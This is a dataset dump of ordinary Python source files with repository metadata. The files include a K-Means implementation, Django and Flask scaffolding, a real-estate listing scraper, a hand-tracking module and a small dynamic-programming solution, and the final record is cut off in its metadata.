blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e17f033e366c7e31b684c3adb569d7875da9a652 | 2d9d7637a3a97dd719a7001a2ee7778682c353ac | /K-Means/kmeans.py | b129eff42836cc0136c811b48221b33149222aaf | [] | no_license | sontallive/MachineLearningCodes | cff0906f9d8ca4acf68dfefbb5e2fcbfc5b39515 | 639fa6bbd98df2480769eec20de703b95c3b4e41 | refs/heads/master | 2020-09-04T14:23:21.041159 | 2019-11-24T06:37:35 | 2019-11-24T06:37:35 | 219,755,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,720 | py | import numpy as np
import time
class KMeans:
def __init__(self,data,k,iter_num = 50):
self.data = data
self.length = data.shape[0]
self.k = k
choice = np.random.choice(a=self.length, size=self.k, replace=False)
self.centroids = self.data[choice]
self.labels = np.zeros(self.length)
self.MAX_ITER_NUM = iter_num
def compute_centroids(self):
for i in range(self.k):
ids = (self.labels == i)
x = self.data[ids]
self.centroids[i,:] = np.mean(x,0)
def update_label(self):
# print('start to update label...',end=' ')
tick = time.time()
for i in range(self.length):
# print('\rstart to update label %d/%d' % (i,self.length),end=" ")
dist = np.sum(np.abs(self.data[i,:] - self.centroids),axis = 1)
# print(dist.shape)
self.labels[i] = np.argmin(dist)
print('time used:%ds' % int(time.time() - tick))
def run(self):
for i in range(self.MAX_ITER_NUM):
last_centroids = self.centroids.copy()
print('K-Means iteration %d/%d..' % (i+1,self.MAX_ITER_NUM))
self.update_label()
self.compute_centroids()
move_step = np.mean(np.abs(last_centroids-self.centroids))
# print(model.labels)W
if move_step < 0.01 :
print("didn't change... leave iteration...")
break
print('move step:',move_step)
if __name__ == "__main__":
data = np.random.randn(100,128)
print(data.shape)
model = KMeans(data,20,iter_num=50)
model.run()
print(model.labels)
| [
"418773551@qq.com"
] | 418773551@qq.com |
3268b47046c0b86ad8023be1ca8423eb73216617 | d04703db63a75a2edc4e0df718d4351570175686 | /main/migrations/0002_auto_20210528_2218.py | ce0aa21d7462538ee4feee545e427604a9201cb9 | [] | no_license | Asliddin7501/new-lms | dfbdb377cacc48adc687298583549f5f21c2f327 | ebd227a5fa606b7e53e6853cf4025aa401b3c471 | refs/heads/main | 2023-06-04T23:20:17.776429 | 2021-06-09T03:13:08 | 2021-06-09T03:13:08 | 369,425,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | # Generated by Django 3.2.3 on 2021-05-28 22:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='sohalar',
options={'verbose_name': 'Soha', 'verbose_name_plural': 'Sohalar'},
),
migrations.AlterModelOptions(
name='tashkilotturlari',
options={'verbose_name': 'Tashkilot turi', 'verbose_name_plural': 'Tashkilot turlari'},
),
migrations.AlterField(
model_name='sohalar',
name='asosiy_soha',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.RESTRICT, to='main.sohalar'),
),
]
| [
"mahmudovasliddin750@gmail.com"
] | mahmudovasliddin750@gmail.com |
4670e76275637a85fcd420befc67f86afc9b748b | cdf57c3783db3b9544abcad1f22d9028d4935a7a | /sska/Version control/otra iteracija/zupinj.py | 3206c89b0ea4e6f32c75a89a157a34cc3ef6b4db | [] | no_license | ntech2/sska-scraapee | 24a5f1c91e0b353defbf5d9bfc3d299b0e0b97f3 | bb75358790f9c6c501faab841eabbc9d5a02d234 | refs/heads/master | 2021-04-06T08:45:07.805245 | 2018-03-08T21:27:53 | 2018-03-08T21:27:53 | 124,449,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,288 | py | # https://www.youtube.com/watch?v=XQgXKtPSzUI 9.11.2017 dzivoklu cena/kvm/riga projekts
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import re
import csv
#noradam lapu,kuru kachat
#my_url= 'https://www.ss.com/lv/real-estate/flats/riga/all/'
my_url= 'https://www.ss.com/lv/real-estate/flats/riga/all/hand_over/page99.html'
#atvert connection ar lapu, nokachat html un saglabat ka variable uclient
uClient = uReq(my_url)
#saglabajam variabli page_html un tajaa saglabajam visu nokacato contentu
page_html = uClient.read()
#aizveram sesiju
uClient.close()
# parsojam html un saglabajam rezultatu kaa page_soup
page_soup = soup(page_html, "html.parser")
#dabuu dzivokla ierakstu. Vajag izlabot velak. nez vai tr_4 ar regex ir pareiz
containers = page_soup.findAll("tr",{"id": re.compile('tr_4.*')})
#raxtam failinj
filename = "ssflats.csv"
f = open(filename, "w")
headers = "Link, Pic, Address, Rooms, Sqrm, Floor, Type, Price\n"
#headers = "Link, Pic, Text, Address, Rooms, Sqrm, Floor, Type, Price\n" rusky jezin nerabotaet
f.write(headers)
#loopinjsh tekosai lapai
for container in containers:
con_link = container.a["href"]
con_pic = container.img["src"]
con_txt = container.div.a.text.strip()
title_container = container.findAll("td",{"class" : 'msga2-o pp6'})
#nultajaa vajag izdomaat, ka atdalit atseviski rajonu, jo tur pa vidu ir br tags
con_addr = title_container[0].text.strip()
con_rooms = title_container[1].text.strip()
con_sqrm = title_container[2].text.strip()
con_floor = title_container[3].text.strip()
con_type = title_container[4].text.strip()
con_monet = title_container[5].text.strip()
#test print vai viss gucchi
#print("con_link: " + con_link)
#print("con_pic: " + con_pic)
#print("con_txt: " + con_txt)
#print("con_addr: " + con_addr)
#print("con_rooms: " + con_rooms)
#print("con_sqrm: " + con_sqrm)
#print("con_floor: " + con_floor)
#print("con_type: " + con_type)
#print("con_monet: " + con_monet)
f.write ("http://ss.com" + con_link + "," + con_pic.replace(".th2.", ".800.") + "," + con_addr.replace(",", ".") + "," + con_rooms.replace(",", ".") + "," + con_sqrm + "," + con_floor + "," + con_type.replace(",", ".") + "," + con_monet.replace(",", "") + "\n")
print("Donezo!")
f.close() | [
"ntech@inbox.lv"
] | ntech@inbox.lv |
0b142f823a12e645d0baba27b37f30d910b1b5fa | 9582341887537c413479f95128f9c9f8df28e317 | /sampledbapp/utils.py | d2a2ca8919eb8d0725cae82c69fa9caa1270476f | [
"Apache-2.0"
] | permissive | csmsoftware/SampleDB | 59e3bfe9cbb579dafe90ad52d364faffb4fc1f4a | 3d82cf98dd37c632b47594b2079bfa9922b21115 | refs/heads/master | 2023-04-08T07:31:14.222665 | 2023-03-22T13:12:07 | 2023-03-22T13:12:07 | 126,981,893 | 0 | 0 | Apache-2.0 | 2021-11-19T09:30:19 | 2018-03-27T12:20:05 | HTML | UTF-8 | Python | false | false | 768 | py | import os
from django.contrib.auth.models import Group
# Recursively check filename and add the iterator to the end.
def build_and_check_file_name(folder_path,iterator,file_name):
if iterator == 0:
full_path = os.path.join(folder_path,file_name)
else:
full_path = os.path.join(folder_path,file_name + "[" + str(iterator) + "]")
# Check if its a file or not. If it is, call function again with increased iterator
if os.path.isfile(full_path):
file_name = build_and_check_file_name(folder_path,iterator+1,file_name)
elif iterator == 0:
file_name = file_name
else:
file_split = file_name.split('.')
file_name = file_split[0] + "[" + str(iterator) + "]." + file_split[1]
return file_name
| [
"g.haggart@imperial.ac.uk"
] | g.haggart@imperial.ac.uk |
7c9b2abd31a7a2086a079b6bda70792712a6fc83 | a24ce66b03b8018bc6f0310c6213f45a0f6736ae | /studentinfo/settings.py | b2b99241129f22ae53b5f95b7609e4c0e165baf6 | [] | no_license | Sabbirdiu/StudentInformation | 67314cf833d017aa9371b7096235a34d3add186b | b79313bb851519024e6a69de34331c4bfa34ae63 | refs/heads/main | 2023-07-19T03:35:23.398207 | 2021-09-08T13:05:52 | 2021-09-08T13:05:52 | 403,605,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,441 | py | """
Django settings for studentinfo project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-w(t9)4-=bltjrpq_@#w@bsxx^&!$9c2ulj7h^#i@cg21obm4*7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# local
'student.apps.StudentConfig',
# 3rd party
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'studentinfo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR /'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'studentinfo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
LOGIN_REDIRECT_URL = 'home'
LOGIN_URL = 'login'
CRISPY_TEMPLATE_PACK = 'bootstrap4' | [
"sabbir.s.dk7@gmail.com"
] | sabbir.s.dk7@gmail.com |
12decf3b44d77f6ad648e90676bdb40d42a7c65b | 0fc2b11f52085b584bc52f4982c297dd2c03e8b2 | /DSC/DP_7_15/1254_yonghun.py | 0c75aa57ebee208bc3a988590862ee28f66fbc95 | [] | no_license | yw9142/Solving-algorithmic-problems | ec9cdb23492ec10e494937f6f221d54d8987be3d | d78b2d518608bd89b463a0e8da1ca30e1dddaec3 | refs/heads/master | 2023-01-10T06:52:55.938545 | 2020-11-10T16:09:05 | 2020-11-10T16:09:05 | 277,123,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 876 | py | # -*- encoding: utf-8 -*-
def palindrome(index, length, str): # Palindrome 확인 함수
i = 0
while index + i < length - i - 1:
if str[index + i] != str[length - i - 1]: # palindrome은 i == N - i - 1 이면 성립함.
return False # 하나라도 성립하지 않는다면 return False
i += 1
return True # 모두 성립한다면 return True
if __name__ == '__main__':
str = input() # 문자열 입력받기
length = len(str) # 문자열의 길이
answer = 0 # Palindrome의 길이
for i in range(length): # length / length + 1 / length + 2
if palindrome(i, length, str):
answer = length + i
break
print(answer)
# Manacher's algorithm :
# https://algospot.com/wiki/read/Manacher's_algorithm
# http://www.secmem.org/blog/2019/03/10/Manacher/
| [
"yw9142@gmail.com"
] | yw9142@gmail.com |
ee97aa1b68604354d9d46457899de563a5531c20 | 5146fcb6117be400eaced506e7b0800309b02953 | /manage.py | 06c63c49c1128bd5fc953cc4db9ecad41abffd1f | [] | no_license | CarpenterChuk/myawesomeblog-project | 4d83460c4746ad2cbd4697f61553278b8e2a9283 | 820f90b451f0be2d8c8ba0ccb9cabe89ecedb88b | refs/heads/main | 2023-03-04T10:42:30.665614 | 2021-02-08T20:58:59 | 2021-02-08T20:58:59 | 336,229,769 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'myawesomeblog.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"stoliarchuk.vlad@gmail.com"
] | stoliarchuk.vlad@gmail.com |
b12c9631dbd2f75d27a5ac4754fee8e016fc58c0 | 60acb606318869410d7437bf6c1a16fd6762b6b4 | /app/__init__.py | 871f9dabd9b8272d79ccffa706296dcf48f3ee49 | [
"Apache-2.0"
] | permissive | heraclitusj/mgek_imgbed | 8fb0c69599fab3fce06684f659dfd5c0b4c5f866 | d8a77ba1401f42237adda1b3ea8611f6464a704e | refs/heads/master | 2022-07-28T01:48:51.314094 | 2020-05-20T05:35:52 | 2020-05-20T05:35:52 | 265,461,338 | 0 | 0 | null | 2020-05-20T05:31:37 | 2020-05-20T05:31:37 | null | UTF-8 | Python | false | false | 1,231 | py | # @Author: Landers1037
# @Github: github.com/landers1037
# @File: __init__.py.py
# @Date: 2020-05-12
from flask import Flask
from app.config import *
from flask_sqlalchemy import SQLAlchemy
from flask_pymongo import PyMongo
#初始时会默认初始化数据库连接,根据engine的配置选择配置的数据库
db = SQLAlchemy()
mongo = PyMongo()
global_config = None
def create_app(mode=None):
application = Flask(__name__, static_url_path='/images', static_folder='../images')
check_config()
global global_config
global_config = read_config()
if mode == 'dev' or global_config.debug:
application.debug = True
application.config.from_object(flask_config())
#对数据库连接添加错误判断
if global_config.engine == 'sqlite':
db.init_app(application)
elif global_config.engine == 'mongo':
mongo.init_app(application)
else:
db.init_app(application)
from .api.img import img
from .api.auth import auth
from .api.sys import sys
application.register_blueprint(img)
application.register_blueprint(auth)
application.register_blueprint(sys)
return application
| [
"32225052+Landers1037@users.noreply.github.com"
] | 32225052+Landers1037@users.noreply.github.com |
83e0f265d472c41c7a3a012032294e7118cc9456 | 75dc7b84c304da00bd0a06146bf1b8cd50de291c | /convert_txt_to_csv/decode3.py | 995058492deafc50567e3555b449eeae27ecaee4 | [] | no_license | salevizo/flinkcep | c7f4ddbef58a41f644badec440ef46d4eb5e4fd2 | 665a63c91406e6477278310a52efd9d96eaa1873 | refs/heads/master | 2020-04-05T13:53:26.158412 | 2019-02-04T23:20:45 | 2019-02-04T23:20:45 | 156,914,199 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py |
#!/usr/bin/python
import re
import csv
import sys
def main(argv):
lines=[]
path=sys.argv[1]
fh = open(path)
#0-vessel1:227705102, 1-vessel2:227574020 , 2-Gap_End_1:1457645565 , 3-Gap_End_2:1457647184, 4-gbsg1x, 5-lon1:48.38216 , 6-lat1:-4.4970617, 7-lon2:48.3797 , 8-Lat2 : -4.4974666
for line in fh:
if "--" not in line:
line_=line.replace("Suspicious RendezVous : { Vessel_1 :", "")
line_=line_.replace("Vessel_2 :", "")
line_=line_.replace("Gap_End_1 :", "")
line_=line_.replace("Gap_End_2 :", "")
line_=line_.replace("GeoHash :", "")
line_=line_.replace("Lon1 :", "")
line_=line_.replace("Lat1 :", "")
line_=line_.replace("Lon2 : ", "")
line_=line_.replace("Lat2 : ", "")
line_=line_.replace("}", "")
l=line_.split(",")
lines.append(l)
fh.close()
name=path.split('/')
name_csv=name[-1].split('.')
name_csv=name_csv[0] + '.csv'
mmsis=[]
with open(name_csv, 'wb') as f: # Just use 'w' mode in 3.x
for i in range(len(lines)) :
w = csv.writer(f, ['mmsi', 'lon', 'lat', 'geohash','gap_end'])
text=[]
text.append(lines[i][0]) #mmsi
text.append(lines[i][5]) #lon
text.append(lines[i][6]) #lat
text.append(lines[i][4]) #geohash
text.append(lines[i][2]) #gapend
w.writerow(text)
text=[]
text.append(lines[i][1]) #mmsi
text.append(lines[i][7]) #lon
text.append(lines[i][8]) #lat
text.append(lines[i][4]) #geohash
text.append(lines[i][3]) #gapend
w.writerow(text)
mmsis.append(lines[i][0])
mmsis.append(lines[i][1])
mmsis=set(mmsis)
print "mmsis are:" + str(mmsis)
print len(mmsis)
print len(lines)*2
#x=lon, y=lat
if __name__ == "__main__":
main(sys.argv[1:])
| [
"alev.sophia@gmail.com"
] | alev.sophia@gmail.com |
6cde627ded6c2d6491fdad4fb0d017931b35ce14 | bdae068f43cdf79c6253990ad0465ef0dc47acc5 | /mainnet/models/serialized_wallet.py | 73f734efbde4327b822405126a2502710f4b9f8a | [] | no_license | mainnet-pat/mainnet-python-generated | 158f29cfa979e936bfa88bf5357a9a7bc84a89cc | 35673f76bc5a90185ef44536b077ab9c173beee3 | refs/heads/master | 2023-01-14T03:42:39.405647 | 2020-11-18T13:39:38 | 2020-11-18T13:39:38 | 313,901,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,211 | py | # coding: utf-8
"""
Mainnet Cash
A developer friendly bitcoin cash wallet api This API is currently in active development, breaking changes may be made prior to official release of version 1. **Important:** This library is in active development # noqa: E501
The version of the OpenAPI document: 0.0.2
Contact: hello@mainnet.cash
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from mainnet.configuration import Configuration
class SerializedWallet(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'wallet_id': 'str'
}
attribute_map = {
'wallet_id': 'walletId'
}
discriminator_value_class_map = {
}
def __init__(self, wallet_id=None, local_vars_configuration=None): # noqa: E501
"""SerializedWallet - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._wallet_id = None
self.discriminator = 'wallet_id'
self.wallet_id = wallet_id
@property
def wallet_id(self):
"""Gets the wallet_id of this SerializedWallet. # noqa: E501
ID that is returned in `wallet` field of /wallet call # noqa: E501
:return: The wallet_id of this SerializedWallet. # noqa: E501
:rtype: str
"""
return self._wallet_id
@wallet_id.setter
def wallet_id(self, wallet_id):
"""Sets the wallet_id of this SerializedWallet.
ID that is returned in `wallet` field of /wallet call # noqa: E501
:param wallet_id: The wallet_id of this SerializedWallet. # noqa: E501
:type wallet_id: str
"""
if self.local_vars_configuration.client_side_validation and wallet_id is None: # noqa: E501
raise ValueError("Invalid value for `wallet_id`, must not be `None`") # noqa: E501
self._wallet_id = wallet_id
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SerializedWallet):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, SerializedWallet):
return True
return self.to_dict() != other.to_dict()
| [
"hello@mainnet.cash"
] | hello@mainnet.cash |
ca55231bed72276df46a7e9b1d23e67ae3171425 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_fade.py | 48b2ce0cd12e383a309567bd8721b04aafb27dd9 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py |
#calss header
class _FADE():
def __init__(self,):
self.name = "FADE"
self.definitions = [u'to (cause to) lose colour, brightness, or strength gradually: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'verbs'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
fa0b0e8390377d9b563df54e6bfa61219bfd4b70 | ad0857eaba945c75e705594a53c40dbdd40467fe | /baekjoon/python/buying_cards_11052.py | b29c863cc46b83674f4b81cdf48a7cffc84bb63f | [
"MIT"
] | permissive | yskang/AlgorithmPractice | c9964d463fbd0d61edce5ba8b45767785b0b5e17 | 3efa96710e97c8740d6fef69e4afe7a23bfca05f | refs/heads/master | 2023-05-25T13:51:11.165687 | 2023-05-19T07:42:56 | 2023-05-19T07:42:56 | 67,045,852 | 0 | 0 | null | 2021-06-20T02:42:27 | 2016-08-31T14:40:10 | Python | UTF-8 | Python | false | false | 630 | py | # Title: 카드 구매하기
# Link: https://www.acmicpc.net/problem/11052
import sys
sys.setrecursionlimit(10 ** 6)
read_single_int = lambda: int(sys.stdin.readline().strip())
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(num_card: int, packs: list):
d = [0 for _ in range(num_card+1)]
for i in range(1, num_card+1):
d[i] = max([d[i-j] + packs[j-1] for j in range(1, i+1)])
return d[num_card]
def main():
N = read_single_int()
P = read_list_int()
print(solution(N, P))
if __name__ == '__main__':
main() | [
"yongsung.kang@gmail.com"
] | yongsung.kang@gmail.com |
153066306d9da80ea24c5bcd251efb27dd8b50e2 | 9b3a290bac71bca52091ef62917ac1bff5de2e08 | /HandTrackingModule.py | f0d10e3bd2d0cf58969bf477ae01e194b24c5f89 | [] | no_license | Badalmishra/mediapipe | e5343ff4c5b368fa29e36c68b905b5a004943310 | a38c0f73bd79d4f91920a58b684e8e70dd261af9 | refs/heads/main | 2023-06-09T06:28:10.740227 | 2021-06-27T07:29:46 | 2021-06-27T07:29:46 | 380,678,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,614 | py | import cv2
import mediapipe as mp
import time
import math
class handDetector():
def __init__(self, mode=False, maxHands=2, detectionCon=0.5, trackCon=0.5):
self.mode = mode
self.maxHands = maxHands
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.mode, self.maxHands,
self.detectionCon, self.trackCon)
self.mpDraw = mp.solutions.drawing_utils
self.tipIds = [4, 8, 12, 16, 20]
def findHands(self, img, draw=True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
# print(results.multi_hand_landmarks)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def findPosition(self, img, handNo=0, draw=True):
xList = []
yList = []
bbox = []
self.lmList = []
if self.results.multi_hand_landmarks:
myHand = self.results.multi_hand_landmarks[handNo]
for id, lm in enumerate(myHand.landmark):
# print(id, lm)
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
xList.append(cx)
yList.append(cy)
# print(id, cx, cy)
self.lmList.append([id, cx, cy])
if draw:
cv2.circle(img, (cx, cy), 5, (255, 0, 255), cv2.FILLED)
xmin, xmax = min(xList), max(xList)
ymin, ymax = min(yList), max(yList)
bbox = xmin, ymin, xmax, ymax
if draw:
cv2.rectangle(img, (bbox[0] - 20, bbox[1] - 20),
(bbox[2] + 20, bbox[3] + 20), (0, 255, 0), 2)
return self.lmList, bbox
def fingersUp(self):
fingers = []
# Thumb
if self.lmList[self.tipIds[0]][1] > self.lmList[self.tipIds[0] - 1][1]:
fingers.append(1)
else:
fingers.append(0)
# 4 Fingers
for id in range(1, 5):
if self.lmList[self.tipIds[id]][2] < self.lmList[self.tipIds[id] - 2][2]:
fingers.append(1)
else:
fingers.append(0)
return fingers
def findDistance(self, p1, p2, img, draw=True):
x1, y1 = self.lmList[p1][1], self.lmList[p1][2]
x2, y2 = self.lmList[p2][1], self.lmList[p2][2]
cx, cy = (x1 + x2) // 2, (y1 + y2) // 2
if draw:
cv2.circle(img, (x1, y1), 15, (255, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 15, (255, 0, 255), cv2.FILLED)
cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)
cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)
length = math.hypot(x2 - x1, y2 - y1)
return length, img, [x1, y1, x2, y2, cx, cy]
def main():
pTime = 0
cap = cv2.VideoCapture(1)
detector = handDetector()
while True:
success, img = cap.read()
img = detector.findHands(img)
lmList = detector.findPosition(img)
if len(lmList) != 0:
print(lmList[4])
cTime = time.time()
fps = 1 / (cTime - pTime)
pTime = cTime
cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3,
(255, 0, 255), 3)
cv2.imshow("Image", img)
cv2.waitKey(1)
if __name__ == "__main__":
main() | [
"badalmishradev@gmail.com"
] | badalmishradev@gmail.com |
159e01e7c2fe4f3943abf29f49cebe1232f215b3 | 53784d3746eccb6d8fca540be9087a12f3713d1c | /res/packages/scripts/scripts/client/gui/Scaleform/daapi/view/meta/VehiclePreviewMeta.py | 3b324dcf456ad95c0dd3471a225ee52f30dbbf10 | [] | no_license | webiumsk/WOT-0.9.17.1-CT | 736666d53cbd0da6745b970e90a8bac6ea80813d | d7c3cf340ae40318933e7205bf9a17c7e53bac52 | refs/heads/master | 2021-01-09T06:00:33.898009 | 2017-02-03T21:40:17 | 2017-02-03T21:40:17 | 80,870,824 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 2,046 | py | # 2017.02.03 21:51:10 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/VehiclePreviewMeta.py
from gui.Scaleform.framework.entities.View import View
class VehiclePreviewMeta(View):
"""
DO NOT MODIFY!
Generated with yaml.
__author__ = 'yaml_processor'
@extends View
"""
def closeView(self):
self._printOverrideError('closeView')
def onBackClick(self):
self._printOverrideError('onBackClick')
def onBuyOrResearchClick(self):
self._printOverrideError('onBuyOrResearchClick')
def onOpenInfoTab(self, index):
self._printOverrideError('onOpenInfoTab')
def onCompareClick(self):
self._printOverrideError('onCompareClick')
def as_setStaticDataS(self, data):
"""
:param data: Represented by VehPreviewStaticDataVO (AS)
"""
if self._isDAAPIInited():
return self.flashObject.as_setStaticData(data)
def as_updateInfoDataS(self, data):
"""
:param data: Represented by VehPreviewInfoPanelVO (AS)
"""
if self._isDAAPIInited():
return self.flashObject.as_updateInfoData(data)
def as_updateVehicleStatusS(self, status):
if self._isDAAPIInited():
return self.flashObject.as_updateVehicleStatus(status)
def as_updatePriceS(self, data):
"""
:param data: Represented by VehPreviewPriceDataVO (AS)
"""
if self._isDAAPIInited():
return self.flashObject.as_updatePrice(data)
def as_updateBuyButtonS(self, data):
"""
:param data: Represented by VehPreviewBuyButtonVO (AS)
"""
if self._isDAAPIInited():
return self.flashObject.as_updateBuyButton(data)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\daapi\view\meta\VehiclePreviewMeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:51:10 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
0ac14a8d24cb5d63875837fa4d9df2a7b1f8b5c6 | 86741e9f531f2aa63af682cc974ebbcc3b202e90 | /allhub/users/ssh_keys.py | 5829881dbdcb9d0302a4e6deb02739cf3e27ca79 | [
"Apache-2.0"
